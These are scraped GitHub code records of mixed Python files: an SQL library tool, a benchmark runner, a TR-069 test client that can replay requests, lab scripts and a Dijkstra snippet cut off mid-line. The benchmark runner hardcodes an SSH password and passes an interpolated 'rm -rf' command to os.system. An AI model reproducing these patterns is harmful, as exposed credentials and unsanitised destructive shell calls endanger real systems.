library thanks for the contribution \\n\"\n \"help this project to grow.\\n\")\n\n except (mysql.connector.errors.DatabaseError, mysql.connector.errors.InterfaceError):\n print(f\" {'*'*9}SORRY! there was an error, sorry for the inconvenience {'*'*9}\")\n print(f\"{'*'*9}Please enter a number value for the publishing year{'*'*9}\")\n\n\ndef explore():\n \"\"\"\n exploring the data of the LMS database\n :return:\n \"\"\"\n\n # initiate the connection\n cnx = main_cnx()\n\n cursor = cnx.cursor()\n\n # getting data for the author\n cursor.execute(f\"select author from {BOOKS_TABLE}\")\n author = cursor.fetchall()\n\n # getting the number of books in the database\n cursor.execute(f'select count(*) from {BOOKS_TABLE}')\n times = cursor.fetchall()\n\n # getting the old books in database\n cursor.execute(f'select book_name, author from {BOOKS_TABLE} where published < 2000 ')\n old = cursor.fetchall()\n\n # processing the retried values\n classic_time = random.randint(0, len(old) - 1)\n random_author = author[random.randint(0, len(author) - 1)][0]\n classic_book = old[classic_time][0]\n classic_author = old[classic_time][1]\n total_books = times[0][0]\n\n # printing the result in Command line using the formatted string\n print(f\"\"\"\n +{'-' * 30}LIBRARY MANAGEMENT SYSTEM{'-' * 30}+\n |{\" \"*85}|\n | Read `By Authors like{\" \"*61}| \n | {random_author}{\" \"*(91 - (8 + 1 + len(random_author)))}| \n | ``````` Total books in library {total_books} ```````{\" \"*(91- (49+len(str(total_books))))}|\n | ~Time less classics{\" \"*63}|\n | {classic_book} by' {classic_author}{\" \"*(91 - (17+1+len(classic_author)+len(classic_book)))}|\n |{\" \"*85}|\n +{'-' * 30}{'*' * 25}{'-' * 30}+\n \"\"\")\n\n\ndef logit(message=''):\n \"\"\"\n logging the events happened in the LMS in the separate file\n called logfile\n :param message: str\n :return: number_id -> str\n \"\"\"\n\n # if the file logfile.log does not exist create the new file named logfile.log\n if os.path.exists('logfile.log') is False:\n with open('logfile.log', 'x') as _:\n pass\n\n # generating the random number\n number_id = ' '.join(secrets.choice(string.digits) for _ in range(5))\n # making the log data\n log_data = [time.asctime(time.localtime()), number_id, message]\n\n # using the json to dump the list into a file and adding the new line after each dump\n with open('logfile.log', 'a') as log_file:\n # dumping the list of the log data to the log file\n json.dump(log_data, log_file)\n # adding the new line at the end of the file\n log_file.write('\\n')\n\n return number_id\n","repo_name":"Croc-1/Project-Bloodymarry","sub_path":"lms/sql_util.py","file_name":"sql_util.py","file_ext":"py","file_size_in_byte":8670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25388802359","text":"import time\nimport os\nfrom typing import Callable\n\nfrom scalablerunner.taskrunner import TaskRunner\nfrom scalablerunner.adapter import DBRunnerAdapter\nfrom cost_estimator import Loader\n\nSERVER_COUNT_LOAD = 4\nSERVER_COUNT_BENCH = 1\nDEST_DIR = '/opt/shared-disk2/sychou/dynamic_rnn/temp_exp'\n\ndef get_temp_dir():\n # Create 'temp' directory\n temp_dir = 'temp'\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n\n return temp_dir\n\ndef get_dataset_dir():\n # Create 'temp' directory\n temp_dir = 'dataset'\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n\n return temp_dir\n\ndef config_db_runner_adapter(db_runner_adapter: DBRunnerAdapter, server_count: int) -> DBRunnerAdapter:\n db_runner_adapter.config(server_count=server_count, jar_dir='latest', sequencer=\"192.168.1.32\", \n servers=[\"192.168.1.31\", \"192.168.1.30\", \"192.168.1.27\", \"192.168.1.26\"], \n # servers=[\"192.168.1.31\"], \n clients=[\"192.168.1.9\", \"192.168.1.8\"], \n # clients=[\"192.168.1.9\"], \n package_path='/home/db-under/sychou/autobench/package/jdk-8u211-linux-x64.tar.gz',\n base_config='configs/lock_overhead_exp/bencher.toml')\n return db_runner_adapter\n\ndef naming(alts: dict):\n rte = alts['vanillabench']['org.vanilladb.bench.BenchmarkerParameters.NUM_RTES']\n return f'rte-{rte}'\n\ndef name_fn(reports_path: str, alts: dict):\n # rw = alts['elasqlbench']['org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.RW_TX_RATE']\n rw_dir = os.path.join(reports_path, naming(alts=alts))\n if not os.path.isdir(rw_dir):\n os.makedirs(rw_dir) \n return rw_dir\n\ndef move2share_fn(reports_path: str, name_fn: Callable, alts: dict, base_config: str):\n dir_name = naming(alts=alts)\n src_path = name_fn(reports_path=reports_path, alts=alts)\n dest_dir = DEST_DIR\n dest_path = os.path.join(dest_dir, dir_name)\n\n os.system(f\"rm -rf {dest_path}; mv {src_path} {dest_dir}\")\n\ndef process_dataset():\n dest_path = DEST_DIR\n total_count = 3\n count = 0\n\n done_map = {}\n\n while count < total_count:\n if os.path.isdir(dest_path):\n files = os.listdir(dest_path)\n for f in files:\n fullpath = os.path.join(dest_path, f, 'reports')\n # if os.path.isfile(fullpath):\n # print(\"File: \", f)\n if os.path.isdir(fullpath) and (not done_map.get(fullpath, False)):\n print(\"Folder: \", f)\n loader = Loader(f'{fullpath}', server_count=SERVER_COUNT_BENCH, n_jobs=8)\n df_features = loader.load_features_as_df(auto_save=True)\n df_latencies = loader.load_latencies_as_df(auto_save=True)\n\n done_map[f'{fullpath}'] = True\n count += 1\n time.sleep(5)\n\ndef upload_jars(dra: DBRunnerAdapter, server_jar: str, client_jar: str, use_stable: bool):\n dra.upload_jars(server_jar=server_jar, client_jar=client_jar, use_stable=use_stable)\n\nif __name__ == '__main__':\n HOSTNAME = \"140.114.85.15\"\n USERNAME = \"db-under\"\n PASSWORD = \"db-under\"\n\n PORT = 22\n SSH_DEFAULT_RETRY_COUT = 3\n SSH_DEFAULT_CMD_RETRY_COUT = 2\n SSH_DEFAULT_IS_RAISE_ERR = False\n WORKSPACE_NAME = 'Lock_Overhead'\n\n dra = DBRunnerAdapter(reports_path=get_dataset_dir(), workspace=WORKSPACE_NAME)\n # Log file name\n dra.output_log(file_name='temp/total.log')\n # Connect to the remote host, where Auto-Bencher loactes\n dra.connect(hostname=HOSTNAME, username=USERNAME, password=PASSWORD, port=PORT)\n\n # Setting behaviors of the DBRunnerAdapter\n # Whether raise exception or not while error occur\n dra.set_default_is_raise_err(default_is_raise_err=SSH_DEFAULT_IS_RAISE_ERR)\n # The retrying count while the SSH connection fails\n dra.set_default_retry_count(default_retry_count=SSH_DEFAULT_RETRY_COUT)\n # The redoing count while the SSH command failed\n dra.set_default_cmd_retry_count(default_cmd_retry_count=SSH_DEFAULT_CMD_RETRY_COUT)\n\n\n ARGS_LOAD = {\n # \"elasqlbench\": {\n # \"org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.INIT_RECORD_PER_PART\": \"100000\"\n # }\n \"elasqlbench\":\n {\n \"org.elasql.bench.benchmarks.tpcc.ElasqlTpccConstants.WAREHOUSE_PER_PART\": \"5\",\n }\n }\n\n ARGS_BENCH = {\n \"vanillabench\": {\n \"org.vanilladb.bench.BenchmarkerParameters.BENCHMARK_INTERVAL\": \"180000\",\n },\n \"elasql\": {\n \"org.elasql.perf.tpart.TPartPerformanceManager.ENABLE_COLLECTING_DATA\": \"true\"\n },\n \"elasqlbench\": {\n \"org.elasql.bench.benchmarks.tpcc.ElasqlTpccConstants.WAREHOUSE_PER_PART\": \"5\",\n # \"org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.INIT_RECORD_PER_PART\": \"100000\",\n # \"org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.RW_TX_RATE\": \"1\"\n }\n }\n\n # Custom parameters\n # [Class, Parameter name, Value]\n PARAMS = [\n [\"vanillabench\", \"org.vanilladb.bench.BenchmarkerParameters.NUM_RTES\", \"100\"],\n # [\"vanillabench\", \"org.vanilladb.bench.BenchmarkerParameters.NUM_RTES\", \"130\"],\n # [\"vanillabench\", \"org.vanilladb.bench.BenchmarkerParameters.NUM_RTES\", \"45\"]\n ]\n\n # Base configurations\n LOAD_CONFIG = 'configs/lock_overhead_exp/load.toml'\n \n BENCH_CONFIG = 'configs/lock_overhead_exp/bench.toml'\n \n # dra = config_db_runner_adapter(dra, server_count=SERVER_COUNT_LOAD)\n # config = {\n # f'Section Initialize': {\n # 'Group Initialize': {\n # 'Call': dra.init_autobencher_load_test_bed,\n # 'Param': {\n # 'server_jar': ['stable_jars/server.jar'], \n # 'client_jar': ['stable_jars/client.jar'],\n # 'alts': [ARGS_LOAD],\n # 'base_config': [LOAD_CONFIG],\n # # An arbitrary name for the parameter that want to modify. You can give multiple custom parameters.\n # # 'custom_param1': PARAMS,\n # }\n # },\n # },\n # }\n # tr = TaskRunner(config=config)\n # tr.run()\n\n dra = config_db_runner_adapter(dra, server_count=SERVER_COUNT_BENCH)\n dra.upload_jars(server_jar='jars/server.jar', client_jar='jars/client.jar', use_stable=True)\n config = {\n f'Section Benchmark': {\n 'Group Benchmark': {\n 'Call': dra.benchmark,\n 'Param': {\n 'name_fn': [name_fn],\n 'alts': [ARGS_BENCH],\n 'base_config': [BENCH_CONFIG],\n # An arbitrary name for the parameter that want to modify. You can give multiple custom parameters.\n 'custom_param1': PARAMS,\n 'callback_fn': [move2share_fn],\n }\n },\n 'Group Process Dataset': {\n 'Call': process_dataset,\n },\n }\n }\n tr = TaskRunner(config=config)\n tr.run()","repo_name":"Database-Project-2021/dynamicRNN","sub_path":"data_collection/lock_overhead_exp.py","file_name":"lock_overhead_exp.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34725709036","text":"from collections import namedtuple\r\n\r\n\r\ndef get_changes(object):\r\n \"\"\"\r\n Função para pegar as mudanças ocorridas em um objeto.\r\n\r\n Deve ser chamada dentro de uma função save.\r\n Parâmetros:\r\n object: objeto que você deseja saber as mudanças.\r\n Retorno:\r\n namedtuple: com os campos:\r\n normais: Lista com os nomes dos campos que mudaram.\r\n back: Lista com os objetos dos campos que mudaram.\r\n old_and_new_object: Dicionário com os campos:\r\n old_object: Objeto antes do save.\r\n new_object: Objeto durante o save.\r\n \"\"\"\r\n object_class = object.__class__\r\n old_object = object_class.objects.get(pk=object.pk)\r\n new_object = object\r\n mudancas = namedtuple(\r\n \"mudancas\", [\"normais\", \"back\", \"old_and_new_object\"]\r\n )\r\n\r\n def houve_mudanca_normal(field):\r\n \"\"\"Retorna o nome do campo se houve mudança e None se não houve.\"\"\"\r\n try:\r\n if getattr(old_object, field.name) != getattr(\r\n new_object, field.name\r\n ):\r\n return field.name\r\n except AttributeError:\r\n ...\r\n\r\n def houve_mudanca_back(field):\r\n try:\r\n if getattr(old_object, field.name) != getattr(\r\n new_object, field.name\r\n ):\r\n return field\r\n except AttributeError:\r\n ...\r\n\r\n change_normal_fields = list(\r\n filter(\r\n campo_valido,\r\n map(\r\n houve_mudanca_normal,\r\n object._meta.fields,\r\n ),\r\n )\r\n )\r\n\r\n change_back_fields = list(\r\n filter(\r\n campo_valido,\r\n map(\r\n houve_mudanca_back,\r\n object._meta.get_fields(),\r\n ),\r\n )\r\n )\r\n old_and_new_object = {\"old_object\": old_object, \"new_object\": new_object}\r\n\r\n return mudancas(\r\n change_normal_fields, change_back_fields, old_and_new_object\r\n )\r\n\r\n\r\ndef campo_valido(field):\r\n \"\"\"Retorna True se o campo for válido e False se não for.\"\"\"\r\n return True if field else False\r\n","repo_name":"TimeNovaData/novadata_utils","sub_path":"novadata_utils/save/get_changes.py","file_name":"get_changes.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12151223595","text":"import warnings\n\nimport requests\nimport requests.auth\nfrom typing import List, Tuple, Any, Dict, Union, Optional\n\nfrom tr069 import util\nfrom tr069.data import device as mdevice\nfrom tr069.data import rpcs\nfrom tr069.data import soap\n\n\ndef _wrap_rpc(rpc):\n \"\"\"\n Copy documentation and annotations from RPC function\n so that they are available from help(Client)\n \"\"\"\n\n def decorator(fn):\n fn.__doc__ = rpc.__doc__\n fn.__annotations__ = rpc.__annotations__.copy()\n fn.__annotations__[\"return\"] = requests.Response\n return fn\n\n return decorator\n\n\nclass Client:\n \"\"\"A TR-069 Client instance to interact with an ACS.\"\"\"\n\n acs_url: str\n requests_kwargs: Dict[str, Any]\n device: mdevice.Device\n log: bool\n _session: requests.Session\n messages: List[requests.Response]\n\n def __init__(\n self,\n acs_url: str,\n device: mdevice.Device = mdevice.DEFAULT,\n *,\n log: bool = True,\n basic_auth: Optional[Tuple[str, str]] = None,\n digest_auth: Optional[Tuple[str, str]] = None,\n cert: Union[Tuple[str, str], str] = None,\n **requests_kwargs\n ):\n \"\"\"\n Args:\n acs_url: The ACS URL.\n device: The device represented by the client.\n log: If True, all requests and responses are logged to stdout.\n basic_auth: A (user, pass) tuple used for HTTP basic authentication.\n digest_auth: A (user, pass) tuple used for HTTP digest authentication.\n cert: TLS Client Certificate, see http://docs.python-requests.org/en/master/user/advanced/#ssl-cert-verification\n **requests_kwargs: Additional arguments passed to subsequent internal calls of requests.post().\n \"\"\"\n self.acs_url = acs_url\n self.device = device\n self.log = log\n\n # auth and cert are actually just added explicitly to improve the documentation.\n if [basic_auth, digest_auth, requests_kwargs.get(\"auth\", None)].count(None) < 2:\n raise ValueError(\n \"auth, basic_auth and digest_auth authentication are mutually exclusive.\")\n if basic_auth:\n requests_kwargs[\"auth\"] = requests.auth.HTTPBasicAuth(*basic_auth)\n if digest_auth:\n requests_kwargs[\"auth\"] = requests.auth.HTTPDigestAuth(*digest_auth)\n\n if cert:\n requests_kwargs[\"cert\"] = cert\n self.requests_kwargs = requests_kwargs\n self._session = requests.Session()\n self.messages = []\n\n @staticmethod\n def _default_headers(data: str):\n default_headers = {\n \"User-Agent\": None,\n }\n\n # TR-069 3.4.1: An empty HTTP POST MUST NOT contain a Content-Type header\n if data:\n default_headers[\"Content-Type\"] = 'text/xml; charset=\"utf-8\"'\n\n # Add proper SOAPAction header (TR-069 3.4.1)\n soap_action = soap.extract_rpc_name(data)\n if soap_action:\n if \"Response\" in soap_action:\n # Add empty header.\n default_headers[\"SOAPAction\"] = \"\"\n else:\n default_headers[\"SOAPAction\"] = soap_action\n\n return default_headers\n\n def request(self, data: str, *, fix_cwmp_id: bool = True, **kwargs) -> requests.Response:\n \"\"\"\n Send a HTTP request to the ACS.\n\n Args:\n data: The request body\n fix_cwmp_id: If true, the cwmp:ID in the body will replaced with the cwmp:ID in the last response.\n **kwargs: Arguments passed to self._session.post()\n\n Returns:\n The ACS' response.\n \"\"\"\n kwargs.update(self.requests_kwargs)\n kwargs.setdefault(\"headers\", self._default_headers(data))\n\n # Re-use the cwmp:ID transmitted in the last response.\n # For client RPCs, that's going to be our default id, so nothing should be changed.\n # For server RPCs, that's the id sent by the server, which we need to account for.\n if fix_cwmp_id and self.messages:\n data = soap.fix_cwmp_id(data, self.messages[-1].text)\n\n resp = self._session.post(self.acs_url, data=data, **kwargs)\n self._record_response(resp)\n return resp\n\n def replay(self, request: Optional[requests.PreparedRequest] = None) -> requests.Response:\n \"\"\"\n Replay a request that has previously been sent.\n Useful to e.g. test for nonce re-use.\n\n Args:\n request: The request to replay. If no request is passed, the last request\n will be replayed.\n \"\"\"\n if request is None:\n request = self.messages[-1].request.copy()\n\n resp = self._session.send(request)\n self._record_response(resp)\n return resp\n\n def _record_response(self, response: requests.Response) -> None:\n self.messages.append(response)\n if self.log:\n # don't log request before sending it, requests adds its own headers after that.\n util.print_http_flow(response)\n\n def __repr__(self) -> str:\n return f\"tr069.Client({self.acs_url}, {len(self.messages)} messages)\"\n\n def done(self) -> requests.Response:\n \"\"\"Indicate to the ACS that the client has finished sending RPCs\"\"\"\n return self.request(\"\")\n\n def handle_server_rpcs(self) -> int:\n \"\"\"\n Handle server RPCs automatically, starting with the last already transmitted RPC.\n This is usually called immediately after .done()\n\n Returns:\n The number of handled RPCs\n\n Raises:\n NotImplementedError if automated handling of the RPC is not implemented.\n \"\"\"\n count = 0\n while True:\n rpc = self.messages[-1]\n if rpc.status_code == 204 or (rpc.status_code == 200 and rpc.text == \"\"):\n break\n self._handle_server_rpc(rpc)\n count += 1\n return count\n\n def _handle_server_rpc(self, rpc: requests.Response):\n rpc_name = soap.extract_rpc_name(rpc.text) or \"unknown\"\n if rpc_name == \"cwmp:SetParameterValues\":\n new_params = rpcs.parse_set_parameter_values(rpc.text)\n self.device.params.update({p.name: p for p in new_params})\n self.set_parameter_values_response()\n elif rpc_name == \"cwmp:GetParameterValues\":\n param_names = rpcs.parse_get_parameter_values(rpc.text)\n params = []\n for p in param_names:\n params.extend(self.device.params.all(p))\n self.get_parameter_values_response(params)\n elif rpc_name == \"cwmp:SetParameterAttributes\":\n warnings.warn(\"Ignoring cwmp:SetParameterAttributes\")\n self.set_parameter_attributes_response()\n elif rpc_name == \"cwmp:GetParameterNames\":\n # We ignore next_level because no-one validates that anyways.\n path, _ = rpcs.parse_get_parameter_names(rpc.text)\n params = self.device.params.all(path)\n self.get_parameter_names_response(params)\n elif rpc_name == \"cwmp:Download\":\n self.download_response()\n else:\n raise NotImplementedError(f\"Unknown server RPC: {rpc_name}\")\n\n def close(self) -> None:\n \"\"\"\n Close any existing connections to the ACS and reset the session.\n \"\"\"\n self._session.close()\n self._session = requests.Session()\n if self.log:\n print(\"Connection closed.\")\n\n @_wrap_rpc(rpcs.make_inform)\n def inform(self, **kwargs):\n kwargs.setdefault(\"device\", self.device)\n return self.request(rpcs.make_inform(**kwargs))\n\n @_wrap_rpc(rpcs.make_get_rpc_methods)\n def get_rpc_methods(self) -> requests.Response:\n return self.request(rpcs.make_get_rpc_methods())\n\n @_wrap_rpc(rpcs.make_request_download)\n def request_download(self, *args, **kwargs):\n return self.request(rpcs.make_request_download(*args, **kwargs))\n\n @_wrap_rpc(rpcs.make_set_parameter_values_response)\n def set_parameter_values_response(self, *args, **kwargs):\n return self.request(rpcs.make_set_parameter_values_response(*args, **kwargs))\n\n @_wrap_rpc(rpcs.make_get_parameter_values_response)\n def get_parameter_values_response(self, *args, **kwargs):\n return self.request(rpcs.make_get_parameter_values_response(*args, **kwargs))\n\n @_wrap_rpc(rpcs.make_set_parameter_attributes_response)\n def set_parameter_attributes_response(self):\n return self.request(rpcs.make_set_parameter_attributes_response())\n\n @_wrap_rpc(rpcs.make_get_parameter_names_response)\n def get_parameter_names_response(self, *args, **kwargs):\n return self.request(rpcs.make_get_parameter_names_response(*args, **kwargs))\n\n @_wrap_rpc(rpcs.make_download_response)\n def download_response(self, *args, **kwargs):\n return self.request(rpcs.make_download_response(*args, **kwargs))\n","repo_name":"mhils/tr069","sub_path":"honeyclient/tr069/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"18491733777","text":"import timeit\r\nfrom random import *\r\nfrom numpy import *\r\n\r\nRcr = 2.16\r\nm = 5 # кількість дослідів\r\nb = 3 # рядки\r\n\r\n\r\ndef show_norm():\r\n global Rcr, m, b\r\n\r\n # 4) Перевірка однорідності дисперсії за критерієм Романовського\r\n while True:\r\n # Початкові параметри\r\n x1_min, x1_max = 10, 60\r\n x2_min, x2_max = -35, 10\r\n y_min, y_max = -70, 30\r\n x = [[-1, -1, +1], # x1\r\n [-1, +1, -1]] # x2\r\n y = [[randint(y_min, y_max) for _ in range(0, m)]\r\n for _ in range(0, b)]\r\n\r\n # 4) Перевірка однорідності дисперсії за критерієм Романовського\r\n # 4.1. Знайдемо середнє значення функції відгуку в рядку:\r\n y_ = [round(sum(y[i]) / len(y[i]), 2) for i in range(0, b)]\r\n\r\n # 4.2. Знайдемо дисперсії по рядках\r\n sig_y = []\r\n for i in range(0, b):\r\n s = 0 # sum\r\n for j in range(0, m):\r\n s += (y[i][j] - y_[i]) ** 2\r\n sig_y.append(round(s / m, 2))\r\n\r\n # 4.3. Обчислимо основне відхилення. 't' means θ (tetha)\r\n sig_t = round(sqrt((2 * (2 * m - 2)) / (m * (m - 4))), 2)\r\n\r\n # 4.4. Обчислимо Fuv\r\n Fuv = [round(sig_y[0] / sig_y[1], 2), # Fuv_1\r\n round(sig_y[2] / sig_y[0], 2), # Fuv_2\r\n round(sig_y[2] / sig_y[1], 2)] # Fuv_3\r\n\r\n # 4.5 θuv. 'T' means θ (Tetha)\r\n Tuv = [round(((m - 2) / m) * Fuv[i], 2) for i in range(0, b)]\r\n\r\n # 4.6 Ruv\r\n Ruv = [round(abs(Tuv[i] - 1) / sig_t, 2) for i in range(b)]\r\n\r\n # 4.7 Перевірка\r\n R = [Ruv[i] < Rcr for i in range(b)]\r\n if R[0] and R[1] and R[2]:\r\n break\r\n else:\r\n print(\"Збільшуємо кількість дослідів.\", \"-\" * 23, sep=\"\\n\")\r\n m += 1\r\n\r\n # 5) Розрахунок нормованих коефіцієнтів рівняння регресії\r\n mx = [round(sum(x[i]) / b, 2) for i in range(2)]\r\n my = round(sum(y_) / b, 2)\r\n a = [round((x[0][0] ** 2 + x[0][1] ** 2 + x[0][2] ** 2) / b, 2),\r\n round((x[0][0] * x[1][0] + x[0][1] * x[1][1] + x[0][2] * x[1][2]) / b, 2),\r\n round((x[1][0] ** 2 + x[1][1] ** 2 + x[1][2] ** 2) / b, 2)]\r\n a11 = round((x[0][0] * y_[0] + x[0][1] * y_[1] + x[0][2] * y_[2]) / b, 2)\r\n a22 = round((x[1][0] * y_[0] + x[1][1] * y_[1] + x[1][2] * y_[2]) / b, 2)\r\n\r\n # Розв'яжемо систему лінійних рівнянь\r\n matrix = array([[1, mx[0], mx[1]],\r\n [mx[0], a[0], a[1]],\r\n [mx[1], a[1], a[2]]])\r\n vector = array([my, a11, a22])\r\n solve = linalg.solve(matrix, vector)\r\n\r\n # 6) Натуралізація коефіціентів\r\n dx1, dx2 = fabs(x1_max - x1_min) / 2, fabs(x2_max - x2_min) / 2\r\n x10, x20 = (x1_max + x1_min) / 2, (x2_max + x2_min) / 2\r\n a0 = round(solve[0] - solve[1] * x10 / dx1 - solve[2] * x20 / dx2, 2)\r\n a1 = round(solve[1] / dx1, 2)\r\n a2 = round(solve[2] / dx2, 2)\r\n\r\n#show_norm()\r\n\r\n\r\nif __name__ == '__main__':\r\n print(timeit.timeit(\"show_norm()\", setup=\"from __main__ import show_norm\", number = 100)/100)\r\n\"\"\"У процесі роботи був використаний критерій Романовського для перевірки однорідності дисперсії\"\"\"\r\n","repo_name":"Polmortem/Lab-works-of-student-27-from-IO-83","sub_path":"Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37301389354","text":"import numpy.random as rd\r\n\r\nN_DISHES = 8\r\nN_DRINKS = 8\r\nN_DESERT = 8\r\nN_ENTRIES = 8\r\nN_SOUP = 2\r\nENTRIES_LIST = [\r\n f'entry_{i}' for i in range(N_ENTRIES)\r\n]\r\nHOT_DISH_LIST = [\r\n f'hot_dish_{i}' for i in range(N_DISHES)\r\n]\r\nDRINK_LIST = [\r\n f'drink_{i}' for i in range(N_DRINKS)\r\n]\r\n\r\nDESERT_LIST = [\r\n f'desert_{i}' for i in range(N_DESERT)\r\n]\r\nSOUP_LIST = [\r\n f'soup_{i}' for i in range(N_SOUP)\r\n]\r\n\r\n\r\nclass Dining_Hall :\r\n def __init__(self, mode) -> None:\r\n self.student_list: list[Student] = [] # students present in the dining hall\r\n self.mode = mode # the mode corresponds to the type of behaviour observed\r\n # #-------SOUP----------------#\r\n # self.soups_list = HOT_DISH_LIST\r\n # self.soups_queue :list[Student] = []\r\n # self.soups_student_serving :list[(Student,int)] = []\r\n\r\n # #-------ENTRY---------------#\r\n # self.entries_list = HOT_DISH_LIST\r\n # self.entries_queue :list[Student] = []\r\n # self.entries_student_serving :list[(Student,int)] = []\r\n\r\n #-------HOT_DISHES---------------#\r\n self.hot_dishes_list = HOT_DISH_LIST\r\n self.hot_dishes_queue :list[Student] = []\r\n self.hot_dishes_student_serving :list[(Student,int)] = []\r\n self.hot_dishes_queues_mode_1 :dict = {dish : [] for dish in self.hot_dishes_list}\r\n self.hot_dishes_student_serving_mode_1 :list[(Student,str)] = []\r\n\r\n # #-------DRINKS---------------#\r\n # self.drinks_list = DRINK_LIST\r\n # self.drinks_queue :list[Student] = []\r\n # self.drinks_student_serving :list[(Student,int)] = []\r\n\r\n # #-------DESERT---------------#\r\n # self.deserts_list = DRINK_LIST\r\n # self.deserts_queue :list[Student] = []\r\n # self.deserts_student_serving :list[(Student,int)] = []\r\n\r\n self.isClose = False\r\n self.student_eating_list :list[Student] = []\r\n\r\n def process_queue(self) :\r\n if self.mode == 0 :\r\n while len(self.hot_dishes_queue) != 0 :\r\n idx_list = [idx for stud, idx in self.hot_dishes_student_serving]\r\n idx = min(idx_list + [len(self.hot_dishes_list)])\r\n stud = self.hot_dishes_queue[0]\r\n stud_dish = stud.hot_dishes[0]\r\n if stud_dish in self.hot_dishes_list[:idx] :\r\n self.hot_dishes_student_serving.append((stud, self.hot_dishes_list.index(stud_dish)))\r\n self.hot_dishes_queue.remove(stud)\r\n else : \r\n break\r\n for stud,idx in self.hot_dishes_student_serving : \r\n stud.serve()\r\n\r\n for stud in self.hot_dishes_queue :\r\n stud.wait()\r\n else :\r\n for dish in self.hot_dishes_queues_mode_1 :\r\n queue = self.hot_dishes_queues_mode_1[dish]\r\n while len(queue) != 0 :\r\n dish_list = [dish for stud, dish in self.hot_dishes_student_serving_mode_1]\r\n stud = queue[0]\r\n if dish not in dish_list :\r\n self.hot_dishes_student_serving_mode_1.append((stud, dish))\r\n self.hot_dishes_queues_mode_1[dish].remove(stud)\r\n else : \r\n break\r\n for stud,dish in self.hot_dishes_student_serving_mode_1 : \r\n stud.serve()\r\n\r\n for dish in self.hot_dishes_queues_mode_1 :\r\n for stud in self.hot_dishes_queues_mode_1[dish] :\r\n stud.wait()\r\n \r\n def process_eating(self, time) :\r\n for stud in self.student_eating_list :\r\n stud.eat(time)\r\n\r\n \r\n\r\n\r\nclass Student :\r\n def __init__(self, sid, dining_hall, mode) :\r\n self.sid = sid\r\n self.mode = mode\r\n self.dining_hall : Dining_Hall = dining_hall\r\n self.wait_time : int = 0 # wait time in seconds\r\n self.move : int = rd.normal(20, 5, 1) # time to go to the restaurant\r\n self.move_time : int = self.move\r\n self.is_moving : bool = False\r\n self.time_to_eat : int = rd.normal(1000, 300) # time the student has been eating\r\n self.eat_time : int = 0\r\n self.random_hot_dishes : int = rd.randint(0,8,size = int(4*rd.random())+1)\r\n # self.entries = self.dining_hall.entries_list\r\n self.hot_dishes = [self.dining_hall.hot_dishes_list[i] for i in self.random_hot_dishes]\r\n # self.drinks = self.dining_hall.drinks_list\r\n # self.deserts = self.dining_hall.deserts_list\r\n # self.soups = self.dining_hall.soups_list\r\n\r\n self.serve_time : int = 0\r\n self.time_to_serve: int = 20 \r\n \r\n def wants_to_eat(self) :\r\n return len(self.hot_dishes) > 0 \r\n \r\n def eat(self, time) :\r\n self.eat_time += 1\r\n if self.time_to_eat <= self.eat_time :\r\n self.eat_time = 0\r\n self.hot_dishes.pop(0)\r\n # the student leaves either because he does not want anything else or the access to the food is close\r\n if not self.wants_to_eat() or time > 10800:\r\n self.leave_dining_hall()\r\n else : \r\n self.go_to_queue()\r\n self.dining_hall.student_eating_list.remove(self)\r\n \r\n def serve(self) :\r\n if self.mode == 0 :\r\n self.serve_time += 1\r\n if self.time_to_serve <= self.serve_time :\r\n self.serve_time = 0\r\n self.dining_hall.hot_dishes_student_serving.remove((self,self.dining_hall.hot_dishes_list.index(self.hot_dishes[0])))\r\n self.go_to_eat()\r\n else :\r\n self.serve_time += 1\r\n if self.time_to_serve <= self.serve_time :\r\n self.serve_time = 0\r\n self.dining_hall.hot_dishes_student_serving_mode_1.remove((self, self.hot_dishes[0]))\r\n self.go_to_eat()\r\n\r\n def go_to_queue(self) :\r\n if self.mode == 0 :\r\n self.dining_hall.hot_dishes_queue.append(self)\r\n else : \r\n self.dining_hall.hot_dishes_queues_mode_1[self.hot_dishes[0]].append(self)\r\n\r\n\r\n def go_to_eat(self) :\r\n self.dining_hall.student_eating_list.append(self)\r\n\r\n def leave_dining_hall(self) :\r\n self.dining_hall.student_list.remove(self)\r\n self.dining_hall.student_eating_list.remove(self)\r\n \r\n def wait(self) :\r\n self.wait_time += 1\r\n \r\n\r\n \r\n","repo_name":"ArnaudMi/InternationalHouseRestaurantSimulation","sub_path":"code_2.0/InternationalHouse.py","file_name":"InternationalHouse.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74191487848","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\nstart = int(input())\ngraph = [[] for _ in range(n + 1)]\ndistance = [INF] * (n + 1)\n\nfor _ in range(m):\n a, b, c = map(int, input().split())\n # a 노드에서 b 노드로 가는 비용이 c\n graph[a].append((b, c))\n\ndef dijkstra(start):\n q = []\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n dist, now = heapq.heappop(q)\n\n # 현재 노드까지 가는 거리가 더 적은경우는 건너뛴다.\n if distance[now] < dist:\n continue\n\n for i in graph[now]:\n cost = dist + i[1]\n\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n\ndijkstra(start)\nfor i in range(1, n + 1):\n # 도달할 수 없는 경우 INFINITY라고 출력\n if distance[i] == INF:\n print('INFINITY')\n else:\n 